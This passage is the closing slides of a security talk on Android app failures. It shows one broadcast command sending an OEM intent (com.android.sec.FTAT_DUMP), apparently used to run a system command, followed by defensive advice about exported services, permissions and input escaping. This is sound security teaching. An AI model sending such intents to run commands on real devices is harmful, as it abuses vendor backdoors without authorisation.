Broadcasting : Intent { act=com.android.sec.FTAT_DUMP (has extras) }Broadcast completed : result=0

OEM SOFTWARE

We execute our system command

Page 143: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Open bar!

OEM SOFTWARE

Page 144: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Moral of the story

It happens at application level

Look after your app’s backdoorsDon’t export local servicesUse a strict permission model

Consider every input as a threatEscape all sensitive parameters you receive

OEM SOFTWARE

Page 145: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

The Android emulator you ever dreamedwww.genymotion.com

Page 146: Android App Bashing- Learn From the Biggest Fails on the Google Play Store - 16-9

Thank You for your time !

http://eyal.fr

SLIDEShttp://bit.ly/andbigfails


Recommended